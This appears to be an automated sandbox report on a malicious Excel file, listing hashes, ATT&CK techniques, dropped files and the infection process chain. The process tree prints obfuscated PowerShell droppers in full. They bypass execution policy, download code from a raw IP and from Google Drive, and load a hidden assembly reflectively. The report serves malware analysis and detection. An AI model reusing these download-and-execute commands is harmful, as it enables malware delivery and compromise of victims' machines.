8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07/11/2024, 02:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635.xls
Size

645KB
MD5

0f35365b3df2274c5f34bd63be285912
SHA1

52571d67c3f6bb3db33dfb79bf157b181c6e9b6a
SHA256

8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635
SHA512

e68276ad9a3cf89f3ce721dce123515efce9a22061ecde74d6662689c34229575dcfa72ff9a606a9148d07877f6b4b74397500d26bf206b56554df0377ba3dac
SSDEEP

12288:ebWNHd0zBVnumU9j/rVDWHlYG7GKanCl3qnklaYr+Uf:Ksd2u3FDWHlpVKXYr3

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2628	mshta.exe
11	2628	mshta.exe
13	2516	pOWErSHElL.eXE
15	1428	powershell.exe
17	1428	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2500	powershell.exe
1428	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2516	pOWErSHElL.eXE
1128	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	pOWErSHElL.eXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWErSHElL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2532	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2516	pOWErSHElL.eXE
1128	powershell.exe
2516	pOWErSHElL.eXE
2516	pOWErSHElL.eXE
2500	powershell.exe
1428	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2516	pOWErSHElL.eXE
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2532	EXCEL.EXE
2532	EXCEL.EXE
2532	EXCEL.EXE
2532	EXCEL.EXE
2532	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2628 wrote to memory of 2516	2628	mshta.exe	33
PID 2628 wrote to memory of 2516	2628	mshta.exe	33
PID 2628 wrote to memory of 2516	2628	mshta.exe	33
PID 2628 wrote to memory of 2516	2628	mshta.exe	33
PID 2516 wrote to memory of 1128	2516	pOWErSHElL.eXE	35
PID 2516 wrote to memory of 1128	2516	pOWErSHElL.eXE	35
PID 2516 wrote to memory of 1128	2516	pOWErSHElL.eXE	35
PID 2516 wrote to memory of 1128	2516	pOWErSHElL.eXE	35
PID 2516 wrote to memory of 2856	2516	pOWErSHElL.eXE	36
PID 2516 wrote to memory of 2856	2516	pOWErSHElL.eXE	36
PID 2516 wrote to memory of 2856	2516	pOWErSHElL.eXE	36
PID 2516 wrote to memory of 2856	2516	pOWErSHElL.eXE	36
PID 2856 wrote to memory of 3060	2856	csc.exe	37
PID 2856 wrote to memory of 3060	2856	csc.exe	37
PID 2856 wrote to memory of 3060	2856	csc.exe	37
PID 2856 wrote to memory of 3060	2856	csc.exe	37
PID 2516 wrote to memory of 1304	2516	pOWErSHElL.eXE	39
PID 2516 wrote to memory of 1304	2516	pOWErSHElL.eXE	39
PID 2516 wrote to memory of 1304	2516	pOWErSHElL.eXE	39
PID 2516 wrote to memory of 1304	2516	pOWErSHElL.eXE	39
PID 1304 wrote to memory of 2500	1304	WScript.exe	40
PID 1304 wrote to memory of 2500	1304	WScript.exe	40
PID 1304 wrote to memory of 2500	1304	WScript.exe	40
PID 1304 wrote to memory of 2500	1304	WScript.exe	40
PID 2500 wrote to memory of 1428	2500	powershell.exe	42
PID 2500 wrote to memory of 1428	2500	powershell.exe	42
PID 2500 wrote to memory of 1428	2500	powershell.exe	42
PID 2500 wrote to memory of 1428	2500	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2532

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2628
- C:\Windows\SysWOW64\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE
  "C:\Windows\SystEM32\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE" "PowersheLl -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE ; IEX($(iEX('[sysTem.tExT.encOdIng]'+[chAr]58+[chAr]58+'Utf8.GEtSTrinG([SYsTEM.CoNveRT]'+[ChaR]0X3A+[CHAR]0X3A+'FroMbase64sTriNG('+[cHAr]34+'JHhTejB4TmxHaWk2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFUmRFRkluSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTW9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdraXR5bWpubixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0QWxZenN4cSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZm1BcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXBxeHVFdkFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZmT3hnV2pUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhb1R3RkxYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4U3oweE5sR2lpNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNjEuMTMwLzExMi9zZWV0aGViZXN0dGhpbmdzdG9nZXRtZXdpdGhncmVhdHRoaW5nc29uaGVyZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3RvZ2V0bWV3aXRoZ3JlYXR0aGluZ3Nvbi52YnMiLDAsMCk7c1RhUlQtc2xlZXAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N0b2dldG1ld2l0aGdyZWF0dGhpbmdzb24udmJzIg=='+[chAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kthynv_b.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEADD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEADC.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3060
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingstogetmewithgreatthingson.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIZWxsSURbMV0rJHNIRWxMaURbMTNdKydYJykgKCAoJ3QwM2ltYWdlVXJsID0gVWZsaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVXlIcXdyblhDbEtCJysnSjNqNjNMbDF0MlN0VmdHeGJTdDAgVWZsO3QwM3dlYicrJ0NsaWVudCAnKyc9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQnKyc7dDAzaW1hZ2VCeXRlcyA9IHQwM3dlYkNsaWVudC5Eb3dubG9hZERhdGEodDAzaW1hZ2VVcmwpO3QwM2ltYWdlVGV4dCA9ICcrJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKHQwM2ltYWdlQnl0ZXMpO3QwM3N0YXJ0RmxhZyA9IFVmbDw8QkFTRTY0X1NUQVJUPj5VZmw7dDAzZW5kRmxhZyA9IFVmbDw8QkFTRTY0X0VORD4+VWZsO3QwM3N0YXJ0SW5kZXggPSB0MDNpbWFnZVRleHQuSW5kZXhPZih0MDNzdGFydEZsJysnYWcpO3QwM2VuZEluZGV4ID0gdDAzaW1hZ2VUZXh0LicrJ0luZGV4T2YodDAzZW5kRmxhZyk7dDAzc3RhcnRJbmRleCAtZ2UgMCAtYW5kJysnIHQwM2VuZEluZGV4JysnIC1ndCB0MDNzdGFydEluZGV4O3QwM3N0YXJ0JysnSW5kZXggKz0gdDAzc3RhcnRGbGFnJysnLkxlbmd0aDt0MDNiYXNlNjRMZW5ndGggPScrJyB0MDNlbmRJbmRleCAtIHQwM3N0YXJ0SW5kZXg7dDAzYmFzZTY0QycrJ29tbWFuZCA9IHQwM2ltYWdlVGV4dC5TdWJzJysndHInKydpbmcodDAzc3RhcnRJbmRleCwgdDAzYmFzZTY0TGVuJysnZ3RoKTt0MDNiYScrJ3NlNjRSZXZlcnNlZCA9IC1qb2luICh0MDNiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgSFpWIEZvckVhY2gtT2JqZWN0IHsgdDAzXyB9KVstMS4uLSh0MDNiYXNlNjRDb21tYW5kLkxlbmd0aCldO3QwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcodDAzYmFzZTY0UmV2ZXJzZWQpO3QnKycwM2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh0MDNjb21tYW5kQnl0ZXMpO3QwM3ZhaU1ldGhvZCA9IFtkbmxpYi5JTycrJy5Ib21lXS5HZXRNZXRob2QoVWZsVkFJVWZsKTt0MDN2YWlNZXRob2QuSW52b2tlKHQwM251bGwsIEAoVWZsJysndHh0LkdGU1NXWi8yMTEvMDMxLjE2LjI3MS43MDEvLzpwdHRoVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxhc3BuZXRfcmVnYnJvd3NlcnNVZmwsIFVmbGRlc2F0aXZhZG9VZmwsIFVmbGRlc2F0aXZhZG9VZmwsVWZsZGUnKydzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWRvVWZsLFVmbGRlc2F0aXYnKydhZG9VZicrJ2wsVWZsZGVzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWQnKydvVWZsLFVmbDFVZmwsVWZsZGVzYXRpdmFkb1VmbCkpOycpLlJFcExhY0UoKFtjSGFSXTcyK1tjSGFSXTkwK1tjSGFSXTg2KSxbc1RSSU5HXVtjSGFSXTEyNCkuUkVwTGFjRSgnVWZsJyxbc1RSSU5HXVtjSGFSXTM5KS5SRXBMYWNFKCd0MDMnLFtzVFJJTkddW2NIYVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2500
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHellID[1]+$sHElLiD[13]+'X') ( ('t03imageUrl = Uflhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKB'+'J3j63Ll1t2StVgGxbSt0 Ufl;t03web'+'Client '+'= New-Object System.Net.WebClient'+';t03imageBytes = t03webClient.DownloadData(t03imageUrl);t03imageText = '+'[System.Text.Encoding]::UTF8.GetString'+'(t03imageBytes);t03startFlag = Ufl<<BASE64_START>>Ufl;t03endFlag = Ufl<<BASE64_END>>Ufl;t03startIndex = t03imageText.IndexOf(t03startFl'+'ag);t03endIndex = t03imageText.'+'IndexOf(t03endFlag);t03startIndex -ge 0 -and'+' t03endIndex'+' -gt t03startIndex;t03start'+'Index += t03startFlag'+'.Length;t03base64Length ='+' t03endIndex - t03startIndex;t03base64C'+'ommand = t03imageText.Subs'+'tr'+'ing(t03startIndex, t03base64Len'+'gth);t03ba'+'se64Reversed = -join (t03base64Command.ToCharArray() HZV ForEach-Object { t03_ })[-1..-(t03base64Command.Length)];t03commandBytes = [System.Convert]::FromBase64String(t03base64Reversed);t'+'03loadedAssembly = [System.Reflection.Assembly]::Load(t03commandBytes);t03vaiMethod = [dnlib.IO'+'.Home].GetMethod(UflVAIUfl);t03vaiMethod.Invoke(t03null, @(Ufl'+'txt.GFSSWZ/211/031.16.271.701//:ptthUfl, UfldesativadoUfl, UfldesativadoUfl, UfldesativadoUfl, Uflaspnet_regbrowsersUfl, UfldesativadoUfl, UfldesativadoUfl,Uflde'+'sativadoUfl,UfldesativadoUfl,Ufldesativ'+'adoUf'+'l,UfldesativadoUfl,Ufldesativad'+'oUfl,Ufl1Ufl,UfldesativadoUfl));').REpLacE(([cHaR]72+[cHaR]90+[cHaR]86),[sTRING][cHaR]124).REpLacE('Ufl',[sTRING][cHaR]39).REpLacE('t03',[sTRING][cHaR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
922fcb811bc7b2a1c7f3d7c94c724089

SHA1
5cd979409e2d207aab5938ddd44106224e56855a

SHA256
c36715d85d9c9ccbb3c1cf781daf12820378e41a8da0fde91927ee7c5ab6ce36

SHA512
acec173cf7b82f22352711505a05ad44150f14f0ab50583fb453a0112fefc5d14f4d0ae943bd5456ca056e6a1294666eb9766f3a5a9bf13683b470915cbd434d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
56ba138021a59e142f23ea3ccdb7818a

SHA1
f3e7b1beffba039756ffb0e1a2168b2b64c5c79e

SHA256
e708722fc9b401b09652e615ed6aa55023c6903ce4b5498edd2694e26405255a

SHA512
b7cafc9daf56ccebf5aecc03564d6ac7f63fb1ce532cb19386b99fb5d7b4a610198e6791f5f9c74ea9a4e41ca2d5d6a812984fd877ba47bfdf3bfb6906630c8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\goodthingsforentireprocessgetmebackwithgoodnewsthings[1].hta

Filesize
8KB

MD5
6774dc51483d737c2e2f25d5d57c5a46

SHA1
2405efc3774d3220a22b5f7a619749e803b601fb

SHA256
ed44e9061bebc3b1fb93ab1fb2007ac62651ef49002614dda38c4b82875e81e9

SHA512
29b84bdd6091406e438677c3bd5b8e538443b1ffe7a77b384f9ac40c015b4c704b32837c65b4590d3f877db81a458964f57ca3793f9a30bf7ec2378670871b94

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE1B8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEADD.tmp

Filesize
1KB

MD5
cdf9c8b6aa5cf6b06abb189005a9fd72

SHA1
12e85170928591575eb921f257eb810325259d7c

SHA256
50aa80337f7e9b253a7d04de06a5cd90c4d7b75ea621c67d6e2305dff2bda8ae

SHA512
99ef90119eb335c13a4da2915f7ac545dcfc3944b443fe4028a404e39e571d61f639aa43e314cc200874df11ae9d2840e41d5a4347d70deb66d9deee52a6e0d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\kthynv_b.dll

Filesize
3KB

MD5
75941f1bf6688fcad08b25d0c55e5964

SHA1
9a61f99f051ccca9d09c1813c3f27b4a7560128b

SHA256
5fd07cea6567fcbf065b055799433c454bb62e56fab3ec710217155384242b8a

SHA512
b29743ffed880711cb4e4fc0c9ab411c482563de2d3d23c2ccdae97167b8caa9d76b438f875102e97fbf476d65058e5f09902be94edac956335ce874b0e61523

Download Submit
C:\Users\Admin\AppData\Local\Temp\kthynv_b.pdb

Filesize
7KB

MD5
40284eeffa913f56a2910f63efd33dec

SHA1
dfad1d41dd7a6ae67980e3ec4a8bd4c0dc6d01af

SHA256
73e720097fd004a48fdaf116c516abf30503de34797ace17cf33c37b63412e6a

SHA512
36e9b68a663a327a26639f3c2d42ebd2fdc3e8ba5cf2382484cb40dcb6cccd1403cce3522170228a8175b371e7b7cc33c5cde83375a468899b7c5a4048451313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
da259ebc974592129d4cdde8d89dbfe8

SHA1
a34b3cf44c6caa9792efde83a7cafa35836487cb

SHA256
d9f61f7eb3706e034d5bec609c898d2c36d326d3ca1ac1e0e0d95b072631d134

SHA512
19d87a94b2b8c4870ce1cc7377316c949e689bd1e83250dafce9fa8626937351f1d4a302c38dd592e83d405ca71fb25851bef82bde524fcdbf661338fad9f9c7

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingstogetmewithgreatthingson.vbs

Filesize
138KB

MD5
494642e2a61a8b0e6bc9ebf07f58aa62

SHA1
d7975e4dc0bedd03fbba1390e3e75bfd5f4c725c

SHA256
ebe70ca2f1c620ca9e3615c0a69e3bf5fffeb3f9f8ba6672eab20c9e952ad311

SHA512
ea79a010e1d7820cc7513c26614be8fc0b3d322055035815458b608be08e4bea293983c68c85a7f6746272d0ba86d45caa66e8d5318d78e8d565bd42a27c1aae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCEADC.tmp

Filesize
652B

MD5
edaf2066186479c6a93bfce8234f7793

SHA1
2a431775eea5b1895e93807ba8cd47cfa735a5d2

SHA256
43dffbe88014da58434a5bc7b0cb4658f0eb9f5c9563995e5a166a44c983c17a

SHA512
5269d762487171aac80e957fc67747a4567b29407913bf261d2836d4d20eab109275361bff56793bf6ad7600ea5c670888643b7ffb0e815aaac9839bcb85a4e3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kthynv_b.0.cs

Filesize
486B

MD5
af0e0993b960e9bba00f8a8f483423d8

SHA1
45f4d42e16df29c262a7e626cdad0281f19b99e9

SHA256
2d5ac3d6056b2457bb1605d4bf44784ef1a51fb02ef49b5b384cd1c011255b0f

SHA512
47e60eaf671bd7edf358d65416c2ca04b766f20e2ae733fc75720244d7a0366914e187142fa07cce86202497435cfec6bc573c4ede7d5cb00472d7ba33964919

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kthynv_b.cmdline

Filesize
309B

MD5
6b41b984ae5932f3090bf2e157241306

SHA1
78c1fa69d15d3a97ef58dc7f79c45dec9ee5bc35

SHA256
3ee12574c69d193ebf9c6c8f9ac9328ed68ffbc97913d9df636d1dae50c202c0

SHA512
d799ff1aed73f1123edd1e185f44fdc564b0085b3372dbf27914c77291234e97265f538797d8efd540c1057867a4cb3c18315e6c5f1900a069302b286cbda179

Download Submit
memory/2532-17-0x0000000002E90000-0x0000000002E92000-memory.dmp

Filesize
8KB

Download
memory/2532-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2532-1-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download
memory/2532-60-0x0000000071DFD000-0x0000000071E08000-memory.dmp

Filesize
44KB

Download
memory/2628-16-0x0000000002BF0000-0x0000000002BF2000-memory.dmp

Filesize
8KB

Download